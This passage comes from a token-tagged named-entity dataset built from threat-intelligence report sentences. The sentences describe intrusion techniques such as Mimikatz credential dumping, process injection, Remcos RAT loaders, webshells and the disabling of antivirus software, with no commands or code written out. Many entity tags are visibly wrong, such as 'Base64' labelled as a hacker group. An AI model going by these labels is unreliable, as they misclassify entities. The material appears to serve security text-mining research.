"Encrypted", - "Multi-Hop", - "Proxies" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "cyber", - "actors", - "use", - "the", - "VPS", - "as", - "well", - "as", - "small", - "office", - "and", - "home", - "office", - "(SOHO)", - "devices", - "as", - "operational", - "nodes", - "to", - "evade", - "detection." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "have", - "been", - "routinely", - "observed", - "using", - "a", - "VPS", - "as", - "an", - "encrypted", - "proxy." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Some", - "of", - "these", - "nodes", - "operate", - "as", - "part", - "of", - "an", - "encrypted", - "proxy", - "service", - "to", - "prevent", - "attribution", - "by", - "concealing", - "their", - "country", - "of", - "origin", - "and", - "TTPs" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "cyber", - "actors", - "have", - "been", - "observed", - "using", - "a", - "network", - "of", - "VPSs", - "and", - "small", - "office", - "and", - "home", - "office", - "(SOHO)", - "routers", - "as", - "part", - "of", - "their", - "operational", - "infrastructure", - "to", - "evade", - "detection", - "and", - "host", - "C2", - "activity" - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "to", - "locate", - "certain", - "files,", - "paths," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "cyber", - "actors", - "have", - "been", - "observed", - "using", - "multiple", - "implants", - "with", - "file", - "system", - "enumeration", - "and", - "traversal", - "capabilities." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "IP", - "address", - "space" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "cyber", - "actors", - "have", - "exploited", - "known", - "vulnerabilities", - "in", - "Internet-facing", - "systems" - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "exploit", - "targeting", - "a", - "public-facing", - "appliance", - "vulnerability." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Exploiting", - "Internet", - "accessible", - "webservers", - "using", - "webshell", - "small", - "code", - "injections", - "against", - "multiple", - "code", - "languages,", - "including", - "net,", - "asp,", - "apsx,", - "php,", - "japx,", - "and", - "cfm." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "These", - "emails", - "may", - "contain", - "a", - "malicious", - "link", - "or", - "files", - "that", - "will", - "provide", - "the", - "cyber", - "actor", - "access", - "to", - "the", - "victim’s", - "device" - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "These", - "emails", - "may", - "contain", - "a", - "malicious", - "link", - "or", - "file", - "that", - "provide", - "the", - "cyber", - "actor", - "access", - "to", - "the", - "victim’s", - "device" - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "after", - "the", - "user", - "clicks", - "on", - "the", - "malicious", - "link", - "or", - "opens", - "the", - "attachment." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "the", - "user", - "clicks", - "on", - "the", - "malicious", - "link", - "or", - "opens", - "the", - "attachment." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "gaining", - "credential", - "access", - "into", - "victim", - "networks", - "by", - "using", - "legitimate,", - "but", - "compromised", - "credentials", - "to", - "access", - "OWA", - "servers,", - "corporate", - "login", - "portals,", - "and", - "victim", - "networks." - ], - "ner_tags": [ - "B-Purp", - "B-SamFile", - "B-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "cyber", - "actors", - "used", - "valid", - "accounts", - "to", - "log", - "into", - "a", - "service", - "specifically", - "designed", - "to", - "accept", - "remote", - "connections," - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "I-Tool", - "I-Tool", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "actor", - "may", - "then", - "perform", - "actions", - "as", - "the", - "logged-on", - "user." - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "cyber", - "actors", - "used", - "valid", - "accounts", - "to", - "log", - "into", - "a", - "service", - "specifically", - "designed", - "to", - "accept", - "remote", - "connections," - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "I-Tool", - "I-Tool", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "actor", - "may", - "then", - "perform", - "actions", - "as", - "the", - "logged-on", - "user." - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Using", - "cmd.exe," - ], - "ner_tags": [ - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Windows", - "Command", - "Shell" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "or", - "command", - "line", - "interface", - "tools" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "executing", - "malware", - "shellcode", - "and", - "batch", - "files" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Employing", - "Python", - "scripts", - "to", - "exploit", - "vulnerable", - "servers." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "cyber", - "actors", - "used", - "valid", - "accounts", - "to", - "log", - "into", - "a", - "service", - "specifically", - "designed", - "to", - "accept", - "remote", - "connections,", - "such", - "as", - "telnet,", - "SSH,", - "RDP,", - "and", - "Virtual", - "Network", - "Computing", - "(VNC)." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "B-Way", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "B-Way" - ] - }, - { - "tokens": [ - "cyber", - "actors", - "used", - "valid", - "accounts", - "to", - "log", - "into", - "a", - "service", - "specifically", - "designed", - "to", - "accept", - "remote", - "connections,", - "such", - "as", - "telnet,", - "SSH,", - "RDP,", - "and", - "Virtual", - "Network", - "Computing", - "(VNC)." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "B-Way", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "B-Way" - ] - }, - { - "tokens": [ - "such", - "as", - "schtask", - "or", - "crontab", - "to", - "create", - "and", - "schedule", - "tasks", - "that", - "enumerate", - "victim", - "devices", - "and", - "networks." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "to", - "establish", - "new", - "services", - "to", - "enable", - "persistence." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "cyber", - "actors", - "have", - "also", - "been", - "observed", - "modifying", - "group", - "policies", - "for", - "password", - "exploitation." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "B-Org", - "I-OffAct", - "I-OffAct", - "O", - "O", - "B-Exp" - ] - }, - { - "tokens": [ - "usage", - "of", - "Mimikatz" - ], - "ner_tags": [ - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "observed", - "targeting", - "the", - "LSASS", - "process", - "or", - "Active", - "directory", - "(NDST.DIT)", - "for", - "credential", - "dumping." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Injecting", - "into", - "the", - "rundll32.exe", - "process", - "to", - "hide", - "usage", - "of", - "Mimikatz,", - "as", - "well", - "as", - "injecting", - "into", - "a", - "running", - "legitimate", - "explorer.exe", - "process", - "for", - "lateral", - "movement." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Using", - "shellcode", - "that", - "injects", - "implants", - "into", - "newly", - "created", - "instances", - "of", - "the", - "Service", - "Host", - "process", - "(svchost)" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "were", - "observed", - "using", - "the", - "7-Zip", - "utility", - "to", - "unzip", - "imported", - "tools", - "and", - "malware", - "files", - "onto", - "the", - "victim", - "device." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "cyber", - "actors", - "have", - "been", - "observed", - "deleting", - "files", - "using", - "rm", - "or", - "del", - "commands." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "B-Org", - "B-OffAct", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "cyber", - "actors", - "were", - "observed", - "Base64", - "encoding", - "files", - "and", - "command", - "strings", - "to", - "evade", - "security", - "measures." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "have", - "been", - "observed", - "using", - "Base-64", - "encoded", - "commands" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "were", - "observed", - "using", - "Microsoft", - "signed", - "binaries,", - "such", - "as", - "Rundll32,", - "as", - "a", - "proxy", - "to", - "execute", - "malicious", - "payloads." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "have", - "been", - "observed", - "using", - "commands,", - "including", - "tasklist,", - "jobs,", - "ps,", - "or", - "taskmgr,", - "to", - "reveal", - "the", - "running", - "processes", - "on", - "victim", - "devices." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Features", - "O", - "B-Way", - "B-Tool", - "B-Tool", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "cyber", - "actors", - "also", - "used", - "on-premises", - "Identity", - "and", - "Access", - "Management", - "(IdAM)", - "and", - "federation", - "services", - "in", - "hybrid", - "cloud", - "environments", - "in", - "order", - "to", - "pivot", - "to", - "cloud", - "resources." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "B-Way", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "cyber", - "actors", - "also", - "used", - "on-premises", - "Identity", - "and", - "Access", - "Management", - "(IdAM)", - "and", - "federation", - "services", - "in", - "hybrid", - "cloud", - "environments", - "in", - "order", - "to", - "pivot", - "to", - "cloud", - "resources." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "B-Way", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "cyber", - "actors", - "used", - "RDP" - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "cyber", - "actors", - "have", - "been", - "observed", - "using", - "the", - "mv", - "command", - "to", - "export", - "files", - "into", - "a", - "location" - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "a", - "downloader", - "that", - "downloads", - "and", - "executes", - "a", - "payload" - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "B-Features", - "O", - "B-Features", - "I-Features", - "I-Features" - ] - }, - { - "tokens": [ - "cyber", - "actors", - "have", - "been", - "observed", - "importing", - "tools", - "from", - "GitHub", - "or", - "infected", - "domains", - "to", - "victim", - "networks" - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "B-Org", - "B-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "cyber", - "actors", - "used", - "the", - "Server", - "Message", - "Block", - "(SMB)", - "protocol", - "to", - "import", - "tools", - "into", - "victim", - "networks." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "it", - "also", - "tries", - "to", - "delete", - "the", - "wp-sale.js", - "file" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile" - ] - }, - { - "tokens": [ - "obfuscated", - "PHP", - "code", - "(again", - "using", - "character", - "code", - "obfuscation):" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "a", - "heavily", - "obfuscated", - "script" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "obfuscated", - "JavaScript", - "code" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "When", - "decoded" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "When", - "decoded,", - "a", - "backdoor", - "is", - "revealed" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "sent", - "as", - "a", - "POST", - "request" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "This", - "backdoor", - "executes", - "arbitrary", - "PHP", - "code", - "sent", - "in", - "POST", - "request", - "parameters." - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "actors", - "disable", - "antivirus", - "software" - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "threat", - "actor", - "deactivated", - "antivirus", - "protocols" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "after", - "receiving", - "phishing", - "emails", - "containing", - "malicious", - "PDF", - "documents", - "[T" - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "I-Tool", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "for", - "initial", - "access", - "is", - "RDP", - "compromise." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "actors", - "often", - "use", - "RDP", - "to", - "move", - "laterally", - "across", - "the", - "network" - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "download", - "multiple", - "tools" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "actors", - "gain", - "initial", - "access", - "through", - "exploiting", - "public-facing", - "applications" - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PsExec", - "has", - "also", - "been", - "used", - "to", - "aid", - "lateral", - "movement" - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features" - ] - }, - { - "tokens": [ - "actors", - "used", - "a", - "legitimate", - "admin", - "account", - "to", - "remotely", - "log", - "on", - "to", - "the", - "domain", - "controller" - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "by", - "modifying", - "Group", - "Policy", - "Objects" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "force", - "a", - "group", - "policy", - "update" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "delete", - "files", - "upon", - "completion—including" - ], - "ner_tags": [ - "B-SamFile", - "I-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "numerous", - "batch", - "(.bat)", - "files", - "on", - "impacted", - "systems" - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Batch", - "files", - "create", - "a", - "new", - "admin", - "user" - ], - "ner_tags": [ - "B-SamFile", - "I-SamFile", - "I-Features", - "I-Features", - "O", - "B-HackOrg", - "B-Features" - ] - }, - { - "tokens": [ - "which", - "are", - "typically", - "transferred", - "as", - "an", - "encrypted", - "7zip", - "file." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "These", - "strings", - "are", - "passed", - "to", - "a", - "decoding", - "function", - "where", - "they", - "are", - "converted", - "from", - "hex", - "to", - "byte", - "and", - "XOR’d", - "with", - "decimal", - "18." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "decoded", - "strings" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Once", - "decoded" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "Base64", - "decodes", - "the", - "payload", - "content" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "to", - "decode", - "the", - "second", - "buffer", - "using", - "key", - "58", - "3E", - "88", - "D0" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "decoded", - "by", - "Shellcode" - ], - "ner_tags": [ - "O", - "O", - "B-SecTeam" - ] - }, - { - "tokens": [ - "These", - "strings", - "are", - "passed", - "to", - "a", - "de-obfuscation", - "function" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PowerShell", - "de-obfuscation", - "routine" - ], - "ner_tags": [ - "B-Way", - "B-SecTeam", - "O" - ] - }, - { - "tokens": [ - "this", - "shellcode", - "is", - "responsible", - "for", - "fetching", - "Remcos", - "RAT" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "used", - "to", - "retrieve", - "a", - "payload", - "package", - "containing", - "the", - "second", - "stage", - "PowerShell", - "and", - "two", - "shellcode", - "buffers" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "retrieves", - "a", - "decoy", - "tax", - "document", - "and", - "VBS", - "script." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "copying", - "the", - "current", - "process", - "command", - "line", - "as", - "a", - "new", - "argument" - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "full", - "command", - "line", - "argument" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "a", - "single", - "payload", - "package", - "is", - "retrieved", - "that", - "contains", - "both", - "the", - "two-stage", - "shellcode" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "highly", - "obfuscated", - "commands", - "and", - "encrypted", - "shellcode." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "PowerShell", - "command", - "contains", - "various", - "obfuscated", - "strings" - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "inject", - "Remcos", - "RAT", - "into", - "a", - "legitimate", - "Windows", - "process", - "such", - "as", - "ieinstal.exe." - ], - "ner_tags": [ - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "injecting", - "it", - "into", - "ieinstall.exe" - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "execution", - "begins", - "with", - "the", - "user", - "clicking", - "on", - "a", - "shortcut", - "file" - ], - "ner_tags": [ - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "executed", - "by", - "the", - "user", - "clicking", - "a", - "shortcut", - "file" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "enticing", - "users", - "to", - "click", - "on", - "malicious", - "shortcut", - "files" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "checks", - "if", - "the", - "system", - "is", - "64-bit" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "remote", - "access", - "and", - "surveillance", - "features" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "keylogging" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "screenshots" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "highly", - "obfuscated", - "and", - "contains", - "junk", - "code", - "to", - "impede", - "analysis." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "script", - "concatenates", - "hundreds", - "of", - "smaller", - "strings", - "into", - "a", - "single", - "variable", - "which", - "ultimately", - "builds", - "and", - "executes" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "payload", - "would", - "then", - "be", - "decrypted", - "through", - "XOR" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "use", - "a", - "set", - "of", - "tools", - "via", - "remote", - "desktop" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "ransomware", - "drops", - "a", - "batch", - "file" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "to", - "steal", - "system", - "information", - "like", - "machine", - "details" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "payload", - "most", - "likely", - "arrives", - "by", - "exploiting", - "public-facing", - "websites", - "and", - "domains." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "targeted", - "vulnerabilities", - "in", - "Microsoft", - "SQL", - "(MS", - "SQL)", - "Server", - "for", - "initial", - "access" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "payload", - "downloaded", - "by", - "the", - "PowerShell", - "script", - "was", - "a", - ".NET", - "downloader,", - "which", - "would", - "subsequently", - "retrieve", - "an", - "encrypted", - "payload", - "from", - "the", - "command-and-control", - "(C&C)", - "server" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "used", - "different", - "sets", - "of", - "defense", - "evasion", - "and", - "reconnaissance", - "tools", - "such", - "as", - "GMER", - "and", - "Advance", - "Process", - "Termination", - "to", - "manually", - "uninstall", - "antivirus", - "products", - "on", - "the", - "target", - "system." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "to", - "terminate", - "security-related", - "processes", - "and", - "services", - "by", - "dropping", - "KILLAV" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "the", - "threat", - "actors", - "who", - "perform", - "brute-force", - "attacks", - "on", - "MS", - "SQL", - "Servers." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Org", - "B-OffAct", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "executed", - "a", - "spam", - "campaign", - "with", - "malicious", - "OneNote", - "file", - "attachments," - ], - "ner_tags": [ - "O", - "O", - "B-Org", - "B-OffAct", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O" - ] - }, - { - "tokens": [ - "The", - "initial", - "attack", - "phase", - "involves", - "infiltrating", - "Internet-facing", - "Microsoft", - "Exchange", - "servers" - ], - "ner_tags": [ - "O", - "O", - "B-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "malware", - "implemented", - "a", - "series", - "of", - "Mimikatz", - "modifications", - "on", - "closed-source", - "tooling" - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "staging", - "a", - "credential", - "theft", - "capability", - "in", - "the", - "LSASS", - "process", - "itself", - "by", - "abusing", - "native", - "Windows", - "capabilities" - ], - "ner_tags": [ - "O", - "O", - "B-SamFile", - "B-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "In", - "order", - "to", - "steal", - "credentials,", - "the", - "attackers", - "employ", - "custom", - "modified", - "versions", - "of", - "Mimikatz" - ], - "ner_tags": [ - "O", - "O", - "O", - "I-Purp", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "stealing", - "credentials", - "from", - "the", - "Local", - "Security", - "Authority", - "Subsystem", - "Service", - "(LSASS)", - "process." - ], - "ner_tags": [ - "B-Way", - "B-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Mimikatz", - "publicly", - "available", - "code", - "(top);", - "strings", - "from", - "a", - "Mimikatz", - "modification" - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "This", - "call", - "instructs", - "LSASS", - "to", - "load", - "and", - "execute", - "pc.dll,", - "which", - "then", - "stages", - "the", - "getHashFlsa64.dll", - "credential", - "theft", - "component." - ], - "ner_tags": [ - "O", - "O", - 